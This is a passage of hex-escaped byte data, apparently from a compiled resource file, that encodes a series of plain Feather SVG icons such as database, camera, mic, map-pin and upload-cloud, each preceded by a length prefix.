\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6d\x69\x6e\x75\x73\
\x2d\x73\x71\x75\x61\x72\x65\x22\x3e\x3c\x72\x65\x63\x74\x20\x78\
\x3d\x22\x33\x22\x20\x79\x3d\x22\x33\x22\x20\x77\x69\x64\x74\x68\
\x3d\x22\x31\x38\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x31\x38\
\x22\x20\x72\x78\x3d\x22\x32\x22\x20\x72\x79\x3d\x22\x32\x22\x3e\
\x3c\x2f\x72\x65\x63\x74\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\
\x22\x38\x22\x20\x79\x31\x3d\x22\x31\x32\x22\x20\x78\x32\x3d\x22\
\x31\x36\x22\x20\x79\x32\x3d\x22\x31\x32\x22\x3e\x3c\x2f\x6c\x69\
\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x74\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x64\x61\x74\x61\x62\
\x61\x73\x65\x22\x3e\x3c\x65\x6c\x6c\x69\x70\x73\x65\x20\x63\x78\
\x3d\x22\x31\x32\x22\x20\x63\x79\x3d\x22\x35\x22\x20\x72\x78\x3d\
\x22\x39\x22\x20\x72\x79\x3d\x22\x33\x22\x3e\x3c\x2f\x65\x6c\x6c\
\x69\x70\x73\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\
\x31\x20\x31\x32\x63\x30\x20\x31\x2e\x36\x36\x2d\x34\x20\x33\x2d\
\x39\x20\x33\x73\x2d\x39\x2d\x31\x2e\x33\x34\x2d\x39\x2d\x33\x22\
\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\
\x22\x4d\x33\x20\x35\x76\x31\x34\x63\x30\x20\x31\x2e\x36\x36\x20\
\x34\x20\x33\x20\x39\x20\x33\x73\x39\x2d\x31\x2e\x33\x34\x20\x39\
\x2d\x33\x56\x35\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\
\x76\x67\x3e\
\x00\x00\x01\x83\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x61\x73\x74\x22\
\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x20\x31\x36\x2e\
\x31\x41\x35\x20\x35\x20\x30\x20\x30\x20\x31\x20\x35\x2e\x39\x20\
\x32\x30\x4d\x32\x20\x31\x32\x2e\x30\x35\x41\x39\x20\x39\x20\x30\
\x20\x30\x20\x31\x20\x39\x2e\x39\x35\x20\x32\x30\x4d\x32\x20\x38\
\x56\x36\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x2d\x32\
\x68\x31\x36\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x20\
\x32\x76\x31\x32\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\
\x20\x32\x68\x2d\x36\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x6c\
\x69\x6e\x65\x20\x78\x31\x3d\x22\x32\x22\x20\x79\x31\x3d\x22\x32\
\x30\x22\x20\x78\x32\x3d\x22\x32\x2e\x30\x31\x22\x20\x79\x32\x3d\
\x22\x32\x30\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\
\x67\x3e\
\x00\x00\x01\xa2\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6d\x69\x63\x22\x3e\
\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x32\x20\x31\x61\x33\
\x20\x33\x20\x30\x20\x30\x20\x30\x2d\x33\x20\x33\x76\x38\x61\x33\
\x20\x33\x20\x30\x20\x30\x20\x30\x20\x36\x20\x30\x56\x34\x61\x33\
\x20\x33\x20\x30\x20\x30\x20\x30\x2d\x33\x2d\x33\x7a\x22\x3e\x3c\
\x2f\x70\x61\x74\x68\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\
\x31\x39\x20\x31\x30\x76\x32\x61\x37\x20\x37\x20\x30\x20\x30\x20\
\x31\x2d\x31\x34\x20\x30\x76\x2d\x32\x22\x3e\x3c\x2f\x70\x61\x74\
\x68\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\
\x79\x31\x3d\x22\x31\x39\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\
\x79\x32\x3d\x22\x32\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x38\x22\x20\x79\x31\x3d\x22\
\x32\x33\x22\x20\x78\x32\x3d\x22\x31\x36\x22\x20\x79\x32\x3d\x22\
\x32\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\
\x3e\
\x00\x00\x01\x90\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6d\x61\x78\x69\x6d\
\x69\x7a\x65\x2d\x32\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\
\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x35\x20\x33\x20\x32\x31\
\x20\x33\x20\x32\x31\x20\x39\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\
\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\
\x69\x6e\x74\x73\x3d\x22\x39\x20\x32\x31\x20\x33\x20\x32\x31\x20\
\x33\x20\x31\x35\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x32\x31\x22\x20\x79\
\x31\x3d\x22\x33\x22\x20\x78\x32\x3d\x22\x31\x34\x22\x20\x79\x32\
\x3d\x22\x31\x30\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\
\x6e\x65\x20\x78\x31\x3d\x22\x33\x22\x20\x79\x31\x3d\x22\x32\x31\
\x22\x20\x78\x32\x3d\x22\x31\x30\x22\x20\x79\x32\x3d\x22\x31\x34\
\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x64\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x61\x6d\x65\x72\
\x61\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x33\x20\
\x31\x39\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x20\x32\
\x48\x33\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x2d\x32\
\x56\x38\x61\x32\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x2d\x32\
\x68\x34\x6c\x32\x2d\x33\x68\x36\x6c\x32\x20\x33\x68\x34\x61\x32\
\x20\x32\x20\x30\x20\x30\x20\x31\x20\x32\x20\x32\x7a\x22\x3e\x3c\
\x2f\x70\x61\x74\x68\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\
\x3d\x22\x31\x32\x22\x20\x63\x79\x3d\x22\x31\x33\x22\x20\x72\x3d\
\x22\x34\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x2f\x73\
\x76\x67\x3e\
\x00\x00\x02\x05\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x70\x61\x63\x6b\x61\
\x67\x65\x22\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x36\
\x2e\x35\x22\x20\x79\x31\x3d\x22\x39\x2e\x34\x22\x20\x78\x32\x3d\
\x22\x37\x2e\x35\x22\x20\x79\x32\x3d\x22\x34\x2e\x32\x31\x22\x3e\
\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\
\x4d\x32\x31\x20\x31\x36\x56\x38\x61\x32\x20\x32\x20\x30\x20\x30\
\x20\x30\x2d\x31\x2d\x31\x2e\x37\x33\x6c\x2d\x37\x2d\x34\x61\x32\
\x20\x32\x20\x30\x20\x30\x20\x30\x2d\x32\x20\x30\x6c\x2d\x37\x20\
\x34\x41\x32\x20\x32\x20\x30\x20\x30\x20\x30\x20\x33\x20\x38\x76\
\x38\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\x20\x31\x20\x31\x2e\
\x37\x33\x6c\x37\x20\x34\x61\x32\x20\x32\x20\x30\x20\x30\x20\x30\
\x20\x32\x20\x30\x6c\x37\x2d\x34\x41\x32\x20\x32\x20\x30\x20\x30\
\x20\x30\x20\x32\x31\x20\x31\x36\x7a\x22\x3e\x3c\x2f\x70\x61\x74\
\x68\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\
\x74\x73\x3d\x22\x33\x2e\x32\x37\x20\x36\x2e\x39\x36\x20\x31\x32\
\x20\x31\x32\x2e\x30\x31\x20\x32\x30\x2e\x37\x33\x20\x36\x2e\x39\
\x36\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x6c\
\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\x22\
\x32\x32\x2e\x30\x38\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\x79\
\x32\x3d\x22\x31\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\
\x73\x76\x67\x3e\
\x00\x00\x01\x46\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x77\x69\x6e\x64\x22\
\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x39\x2e\x35\x39\x20\
\x34\x2e\x35\x39\x41\x32\x20\x32\x20\x30\x20\x31\x20\x31\x20\x31\
\x31\x20\x38\x48\x32\x6d\x31\x30\x2e\x35\x39\x20\x31\x31\x2e\x34\
\x31\x41\x32\x20\x32\x20\x30\x20\x31\x20\x30\x20\x31\x34\x20\x31\
\x36\x48\x32\x6d\x31\x35\x2e\x37\x33\x2d\x38\x2e\x32\x37\x41\x32\
\x2e\x35\x20\x32\x2e\x35\x20\x30\x20\x31\x20\x31\x20\x31\x39\x2e\
\x35\x20\x31\x32\x48\x32\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\
\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x57\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6d\x6f\x72\x65\x2d\
\x68\x6f\x72\x69\x7a\x6f\x6e\x74\x61\x6c\x22\x3e\x3c\x63\x69\x72\
\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\x22\x20\x63\x79\x3d\x22\
\x31\x32\x22\x20\x72\x3d\x22\x31\x22\x3e\x3c\x2f\x63\x69\x72\x63\
\x6c\x65\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\
\x39\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x31\x22\
\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x63\x69\x72\x63\x6c\
\x65\x20\x63\x78\x3d\x22\x35\x22\x20\x63\x79\x3d\x22\x31\x32\x22\
\x20\x72\x3d\x22\x31\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\
\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x0e\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x68\x65\x76\x72\
\x6f\x6e\x2d\x72\x69\x67\x68\x74\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\
\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x39\x20\x31\x38\
\x20\x31\x35\x20\x31\x32\x20\x39\x20\x36\x22\x3e\x3c\x2f\x70\x6f\
\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x42\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6d\x61\x70\x2d\x70\
\x69\x6e\x22\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\x31\
\x20\x31\x30\x63\x30\x20\x37\x2d\x39\x20\x31\x33\x2d\x39\x20\x31\
\x33\x73\x2d\x39\x2d\x36\x2d\x39\x2d\x31\x33\x61\x39\x20\x39\x20\
\x30\x20\x30\x20\x31\x20\x31\x38\x20\x30\x7a\x22\x3e\x3c\x2f\x70\
\x61\x74\x68\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\
\x31\x32\x22\x20\x63\x79\x3d\x22\x31\x30\x22\x20\x72\x3d\x22\x33\
\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x2f\x73\x76\x67\
\x3e\
\x00\x00\x01\xaf\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x75\x70\x6c\x6f\x61\
\x64\x2d\x63\x6c\x6f\x75\x64\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\
\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x36\x20\x31\x36\
\x20\x31\x32\x20\x31\x32\x20\x38\x20\x31\x36\x22\x3e\x3c\x2f\x70\
\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\
\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\x22\x31\x32\x22\x20\x78\x32\
\x3d\x22\x31\x32\x22\x20\x79\x32\x3d\x22\x32\x31\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x32\
\x30\x2e\x33\x39\x20\x31\x38\x2e\x33\x39\x41\x35\x20\x35\x20\x30\
\x20\x30\x20\x30\x20\x31\x38\x20\x39\x68\x2d\x31\x2e\x32\x36\x41\
\x38\x20\x38\x20\x30\x20\x31\x20\x30\x20\x33\x20\x31\x36\x2e\x33\
\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\
\x6e\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x36\x20\x31\x36\
\x20\x31\x32\x20\x31\x32\x20\x38\x20\x31\x36\x22\x3e\x3c\x2f\x70\
\x6f\x6c\x79\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x7f\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
